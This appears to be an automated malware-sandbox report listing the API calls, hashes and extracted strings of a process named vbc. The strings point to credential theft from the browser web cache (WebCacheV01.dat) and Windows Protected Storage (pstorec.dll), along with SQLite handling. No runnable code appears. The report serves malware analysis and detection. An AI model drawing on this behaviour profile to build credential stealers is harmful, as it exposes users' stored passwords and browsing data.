                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@$DeleteHandleIconLoadModuleObject
                                                              • String ID:
                                                              • API String ID: 659443934-0
                                                              • Opcode ID: 4dbe040157989d7de390748bca507761115a5a0bb1080321a3776b3c91600ff6
                                                              • Instruction ID: 1cba439d4a63bd06fd13ecdd31e81b6a0d9710d4e5327182bdbee0994cb59d35
                                                              • Opcode Fuzzy Hash: 4dbe040157989d7de390748bca507761115a5a0bb1080321a3776b3c91600ff6
                                                              • Instruction Fuzzy Hash: 322193B19012989FDB30EF768C496DEB7A9AF84715F10863BF80CDB241DF794A118B58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADC7
                                                                • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADD5
                                                                • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADE6
                                                                • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADFD
                                                                • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040AE06
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040AE3C
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040AE4F
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040AE62
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040AE75
                                                              • free.MSVCRT(00000000), ref: 0040AEAE
                                                                • Part of subcall function 00408037: free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??3@$free
                                                              • String ID:
                                                              • API String ID: 2241099983-0
                                                              • Opcode ID: 26f864412507da39c3915d5c0e415b0742169c07d2ec12ff834013a94cdf234a
                                                              • Instruction ID: 5cedf5899733f7fd452d28a3e5974aab2a3b061775a7969347507653aae84efd
                                                              • Opcode Fuzzy Hash: 26f864412507da39c3915d5c0e415b0742169c07d2ec12ff834013a94cdf234a
                                                              • Instruction Fuzzy Hash: 13010832946A20ABC6367B2AD50251FB368BE91B90306457FF445BB3818F3C7C5186DF
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 00414CC6
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00414CE6
                                                              • malloc.MSVCRT ref: 00414CEC
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00414D0A
                                                              • free.MSVCRT(?), ref: 00414D13
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                              • String ID:
                                                              • API String ID: 4053608372-0
                                                              • Opcode ID: cac492a427f6a84e9520b422f084cd25016ceb8bb2eb4011aba28b2799268d67
                                                              • Instruction ID: 44ea64674f021cea2031e16b60495934b5371f4db2927085d3abb6a650cf4446
                                                              • Opcode Fuzzy Hash: cac492a427f6a84e9520b422f084cd25016ceb8bb2eb4011aba28b2799268d67
                                                              • Instruction Fuzzy Hash: 6601F4B140011DBEAF115FA9DCC5CAF7EACDA457E8720036AF810E2190E6344E4056B8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetParent.USER32(?), ref: 0040A314
                                                              • GetWindowRect.USER32 ref: 0040A321
                                                              • GetClientRect.USER32 ref: 0040A32C
                                                              • MapWindowPoints.USER32 ref: 0040A33C
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040A358
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              • String ID:
                                                              • API String ID: 4247780290-0
                                                              • Opcode ID: 08c57ff735731e7da7a27fa3f9b2ad0737e344cc782b350b7b638dd860d33b4b
                                                              • Instruction ID: 816d64d46c4b910dad83cc5cff1f19606824cbaca0e9d5d20ff5cebd8420fa85
                                                              • Opcode Fuzzy Hash: 08c57ff735731e7da7a27fa3f9b2ad0737e344cc782b350b7b638dd860d33b4b
                                                              • Instruction Fuzzy Hash: 06014836800129BBDB11AFA59C49EFFBFBCFF46B15F044169F901A2190D77896028BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00407144: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,00410671,?,?), ref: 00442202
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00442216
                                                              • memset.MSVCRT ref: 00442225
                                                                • Part of subcall function 00407B93: ReadFile.KERNEL32(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00442248
                                                                • Part of subcall function 00441FDC: memchr.MSVCRT ref: 00442017
                                                                • Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420BB
                                                                • Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420CD
                                                                • Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420F5
                                                              • CloseHandle.KERNEL32(00000000), ref: 0044224F
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                              • String ID:
                                                              • API String ID: 1471605966-0
                                                              • Opcode ID: 8b639e040a424723dd7c4a05a87d01465b2bc0cd09c390aa402883c8e5bca71c
                                                              • Instruction ID: 5cd116c641245c85bcd5bad65d9d69835b0888748ca48550e443bbafd66aa86b
                                                              • Opcode Fuzzy Hash: 8b639e040a424723dd7c4a05a87d01465b2bc0cd09c390aa402883c8e5bca71c
                                                              • Instruction Fuzzy Hash: 3DF0FC325041007AE21077329D4AF6B7B9CDF85761F10053FF515911D2EA789904C179
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 0bf5e55d06652d32e8ea99ae0254972258a1deffc647e40336a9ab96fb38b775
                                                              • Instruction ID: 7485fa72425b52f9fdb5b203d173836123891f19866e380edd82503d68adac07
                                                              • Opcode Fuzzy Hash: 0bf5e55d06652d32e8ea99ae0254972258a1deffc647e40336a9ab96fb38b775
                                                              • Instruction Fuzzy Hash: D8F0FF72509701AFD720AF6999D991BB7F9BF943147A0493FF049D3A41CB78A8904A18
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00408B10: OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00408B85
                                                                • Part of subcall function 00408B10: GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00408BA4
                                                                • Part of subcall function 00408B10: DuplicateHandle.KERNEL32(00000000,00000104,00000000), ref: 00408BB1
                                                                • Part of subcall function 00408B10: GetFileSize.KERNEL32(00000000,00000000), ref: 00408BC6
                                                                • Part of subcall function 00408B10: CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00408BF0
                                                                • Part of subcall function 00408B10: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 00408C05
                                                                • Part of subcall function 00408B10: WriteFile.KERNEL32(?,00000000,00000104,004091EB,00000000), ref: 00408C20
                                                                • Part of subcall function 00408B10: UnmapViewOfFile.KERNEL32(00000000), ref: 00408C27
                                                                • Part of subcall function 00408B10: CloseHandle.KERNEL32(?), ref: 00408C30
                                                              • CloseHandle.KERNEL32(000000FF,000000FF,00000000,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409074
                                                                • Part of subcall function 00408D9D: memset.MSVCRT ref: 00408E72
                                                                • Part of subcall function 00408D9D: wcschr.MSVCRT ref: 00408EAA
                                                                • Part of subcall function 00408D9D: memcpy.MSVCRT ref: 00408EDE
                                                              • DeleteFileW.KERNEL32(?,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409095
                                                              • CloseHandle.KERNEL32(000000FF,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 004090BC
                                                                • Part of subcall function 00408C67: memset.MSVCRT ref: 00408CAF
                                                                • Part of subcall function 00408C67: _snwprintf.MSVCRT ref: 00408D49
                                                                • Part of subcall function 00408C67: free.MSVCRT(000000FF,?,000000FF,00000000,00000104,74B5F560), ref: 00408D7D
                                                              Strings
                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00408FB4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat
                                                              • API String ID: 1979745280-1514811420
                                                              • Opcode ID: 296897d7b9fc56a1ed802aa42710325314df0d67c48e9c21b811ee4e31976f5b
                                                              • Instruction ID: f61eabc5127fffa0127996e1b9e76e3c42d0daca9916cdcd83e0194a9dfe4be1
                                                              • Opcode Fuzzy Hash: 296897d7b9fc56a1ed802aa42710325314df0d67c48e9c21b811ee4e31976f5b
                                                              • Instruction Fuzzy Hash: 10314CB1C006289BCF60DFA5CD855CEFBB8AF40315F1002ABA518B31A2DB756E85CF59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 004121C3: LoadLibraryW.KERNEL32(shell32.dll,0040E314,00000000,?,00000002), ref: 004121D1
                                                                • Part of subcall function 004121C3: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004121E6
                                                              • memset.MSVCRT ref: 004122C9
                                                              • RegCloseKey.ADVAPI32(?), ref: 00412330
                                                              • wcscpy.MSVCRT ref: 0041233E
                                                                • Part of subcall function 00407674: GetVersionExW.KERNEL32(00450DA8,0000001A,00412291), ref: 0040768E
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122E4, 004122F4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressCloseLibraryLoadProcVersionmemsetwcscpy
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              • API String ID: 4214892137-2036018995
                                                              • Opcode ID: c9c64e8e2f051e8caefe2aaada980519e2fc3c71178caf599d8c015b906c46d2
                                                              • Instruction ID: c2720df25ff2a98c700ebd4409fa2125fd2182e4a6debc52b8ada4298b6a052e
                                                              • Opcode Fuzzy Hash: c9c64e8e2f051e8caefe2aaada980519e2fc3c71178caf599d8c015b906c46d2
                                                              • Instruction Fuzzy Hash: 29110831800114BAEB24E7599E4EEEF737CEB05304F5100E7F914E2151E6B85FE5969E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              • API String ID: 1579243037-1578091866
                                                              • Opcode ID: b8bcc0ce675c29f22b0227198f2ab65a41989cf9845e13ce1ccf23b6e43e1f16
                                                              • Instruction ID: 426287280b2395c37d482f654794667c251e21b6a2c3e86ec69022cc6db77350
                                                              • Opcode Fuzzy Hash: b8bcc0ce675c29f22b0227198f2ab65a41989cf9845e13ce1ccf23b6e43e1f16
                                                              • Instruction Fuzzy Hash: 4821F8317006019FD714AB75C981E55B3A9FF95318F01053EF519A72D2CB7ABC11CB9A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 0040C37F
                                                              • memset.MSVCRT ref: 0040C396
                                                                • Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
                                                                • Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03
                                                              • _snwprintf.MSVCRT ref: 0040C3C5
                                                                • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                                              • String ID: </%s>
                                                              • API String ID: 168708657-259020660
                                                              • Opcode ID: ed3ca334932eb13030ad141ea1100de8b1267ec76abb3a8f7f71a50922ffdfbd
                                                              • Instruction ID: 40532074a48dce177473b235f1db1661615fe75cb863f0afecc7fe9ed9b88556
                                                              • Opcode Fuzzy Hash: ed3ca334932eb13030ad141ea1100de8b1267ec76abb3a8f7f71a50922ffdfbd
                                                              • Instruction Fuzzy Hash: 910136F3D4012976EB20A755DC45FEE76BCEF45308F4000B6BB09B7181DB78AA458AA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                              • String ID: caption
                                                              • API String ID: 1523050162-4135340389
                                                              • Opcode ID: 0770d01bbebb907716830064d8bced7af567b4e8952be56cced1b648d4788750
                                                              • Instruction ID: f5bb4e3483ddd063dbb45333af41605001ac6cd66b5ccbc099165aa82e617e5a
                                                              • Opcode Fuzzy Hash: 0770d01bbebb907716830064d8bced7af567b4e8952be56cced1b648d4788750
                                                              • Instruction Fuzzy Hash: 44F0C83690031466FB20EB51DD4EB9A3768AB04755F5000B6FF04B61D2DBF89E50CBAE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 004117E3: FreeLibrary.KERNEL32(?,00409EC4,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 004117EF
                                                              • LoadLibraryW.KERNEL32(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc
                                                              • String ID: PStoreCreateInstance$pstorec.dll
                                                              • API String ID: 145871493-2881415372
                                                              • Opcode ID: 0c221e4a7068c4d6934d41343829b8b78c46c2a8619205bb2734fd8b0e3e91f3
                                                              • Instruction ID: b7b877f0cca51cf4ed89ca0d343beedc6eb81d3109fbfde12955c258fb57ec89
                                                              • Opcode Fuzzy Hash: 0c221e4a7068c4d6934d41343829b8b78c46c2a8619205bb2734fd8b0e3e91f3
                                                              • Instruction Fuzzy Hash: 4DF0E2713047035BE7206BB99C45B9776E85F40715F10842EB126D16E2DBBCD9808BA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 004075AD: memset.MSVCRT ref: 004075B7
                                                                • Part of subcall function 004075AD: wcscpy.MSVCRT ref: 004075F7
                                                              • CreateFontIndirectW.GDI32(?), ref: 0040105D
                                                              • SendDlgItemMessageW.USER32 ref: 0040107C
                                                              • SendDlgItemMessageW.USER32 ref: 0040109A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 210187428-168460110
                                                              • Opcode ID: 9567ec9b2f0dc6d22a5446aca1e43186409379ab266c501c72e5b3238589e89f
                                                              • Instruction ID: b86dbe1d582a7894089203107e7a1e4413fc3d6f7e8de8594febed0b37e93160
                                                              • Opcode Fuzzy Hash: 9567ec9b2f0dc6d22a5446aca1e43186409379ab266c501c72e5b3238589e89f
                                                              • Instruction Fuzzy Hash: 56F05E75A4030877E621ABA0DC06F8A7BB9B740B01F000935B711B51E0D7E4A285C658
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,004112EE,?,?,?,?,?,00000000,?), ref: 00411151
                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0041116B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: GetProcessTimes$kernel32.dll
                                                              • API String ID: 1646373207-3385500049
                                                              • Opcode ID: 464f22052b3d8a0ba402789ad02750f959a9c2b374b1230dcbafe23b26c1554b
                                                              • Instruction ID: be5b0e9885743e8d30da273d8ef78610b28524ab18dcfae55e11e98fa027414b
                                                              • Opcode Fuzzy Hash: 464f22052b3d8a0ba402789ad02750f959a9c2b374b1230dcbafe23b26c1554b
                                                              • Instruction Fuzzy Hash: 4FF01C35104308AFEB128FA0EC04B967BA9BB08749F048425F608C1671C775C9A0DF58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ClassName_wcsicmpmemset
                                                              • String ID: edit
                                                              • API String ID: 2747424523-2167791130
                                                              • Opcode ID: 5d550bad1fc3d430151135b806da61cbea55bdd82f1e1fbc5f53ec133c7d6f5f
                                                              • Instruction ID: 51a03c7d5923a90201923a44b10f324a390683a0d3b2f84b2934c4bf373e0ab9
                                                              • Opcode Fuzzy Hash: 5d550bad1fc3d430151135b806da61cbea55bdd82f1e1fbc5f53ec133c7d6f5f
                                                              • Instruction Fuzzy Hash: A9E04872D8031E7AFB14ABA0DC4BFA977BCBB04704F5001F5B615E10D2EBB4A6454A5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy$memcmp
                                                              • String ID:
                                                              • API String ID: 3384217055-0
                                                              • Opcode ID: c21ad6a5d3121964cfee4e4549eeaad2127827bfa0247cfb1633fe6ae368a6b9
                                                              • Instruction ID: 295c5a0bc2866328f8dcc37ada2a4d99e769f04d629d2bea2717987aff5dfa66
                                                              • Opcode Fuzzy Hash: c21ad6a5d3121964cfee4e4549eeaad2127827bfa0247cfb1633fe6ae368a6b9
                                                              • Instruction Fuzzy Hash: 01217C72E10248BBDB18DAA5DC56E9F73ECEB44740F50042AB512D7281EB78E644C765
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: ef22b1934ad2d52127aca45cd93deb21b3ee899ba2995d0c9766137b2d6f5093
                                                              • Instruction ID: 5db9a22820b402d4d4dd4a010236648e296a7231ae54e5ee969484aed16c8927
                                                              • Opcode Fuzzy Hash: ef22b1934ad2d52127aca45cd93deb21b3ee899ba2995d0c9766137b2d6f5093
                                                              • Instruction Fuzzy Hash: D301F0B174070077D335AA35CC03F1A73E49FA1714F400E1DF152666C2D7F8A105866D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004158E7
                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 00415912
                                                              • GetLastError.KERNEL32 ref: 00415939
                                                              • CloseHandle.KERNEL32(00000000), ref: 0041594F
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseCreateErrorHandleLastMappingView
                                                              • String ID:
                                                              • API String ID: 1661045500-0
                                                              • Opcode ID: e54a1143c91b2cced6003210cc0bcdbeb5c1320b0c8b584585a67ef015de7640
                                                              • Instruction ID: 02e61587b06ba7d058713df3830c0e33945dcb010177779d6ae1e8dc7ea6695b
                                                              • Opcode Fuzzy Hash: e54a1143c91b2cced6003210cc0bcdbeb5c1320b0c8b584585a67ef015de7640
                                                              • Instruction Fuzzy Hash: B6518EB4214B02DFD724DF25C981AA7B7E9FB84315F10492FE88286651E734E854CB59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 004132EA: memset.MSVCRT ref: 00413304
                                                              • memcpy.MSVCRT ref: 0042C42D
                                                              Strings
                                                              • virtual tables may not be altered, xrefs: 0042C384
                                                              • sqlite_altertab_%s, xrefs: 0042C3FE
                                                              • Cannot add a column to a view, xrefs: 0042C39A
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                              • API String ID: 1297977491-2063813899
                                                              • Opcode ID: 40a8b2228a2977a7503a5a3e35c928d52b5b371965e96d55401405ecbc1ecc8d
                                                              • Instruction ID: 3e8a37011c5d834ac6e6d4f8fd11fd3d4e87e0ccd438cada7bf19ffd6667b676
                                                              • Opcode Fuzzy Hash: 40a8b2228a2977a7503a5a3e35c928d52b5b371965e96d55401405ecbc1ecc8d
                                                              • Instruction Fuzzy Hash: 03419D71A00615AFDB10DF69D881A5EB7F0FF08314F24856BE8489B352D778EA51CB88
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: $, $CREATE TABLE
                                                              • API String ID: 3510742995-3459038510
                                                              • Opcode ID: 9c967c3a06afb765e02c907f2e49235dd04f948cd2abf78a2709aa5cc33f4167
                                                              • Instruction ID: 75c0c8dac0447bb43292008ef446c40d7ab48a9469891862f1914eead86e2b05
                                                              • Opcode Fuzzy Hash: 9c967c3a06afb765e02c907f2e49235dd04f948cd2abf78a2709aa5cc33f4167
                                                              • Instruction Fuzzy Hash: C3518171E00219DFCF10DF9AD4856AEB7B5FF44309F64809BE841AB205D778AA45CB98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 004047A1
                                                                • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                                • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,?,?), ref: 0040A0CD
                                                                • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                                • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                                • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                                • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                                • Part of subcall function 00407CFE: memset.MSVCRT ref: 00407D1F
                                                                • Part of subcall function 00407CFE: _snwprintf.MSVCRT ref: 00407D52
                                                                • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D5E
                                                                • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D76
                                                                • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D84
                                                                • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D97
                                                                • Part of subcall function 00407AB6: GetOpenFileNameW.COMDLG32(?), ref: 00407AFF
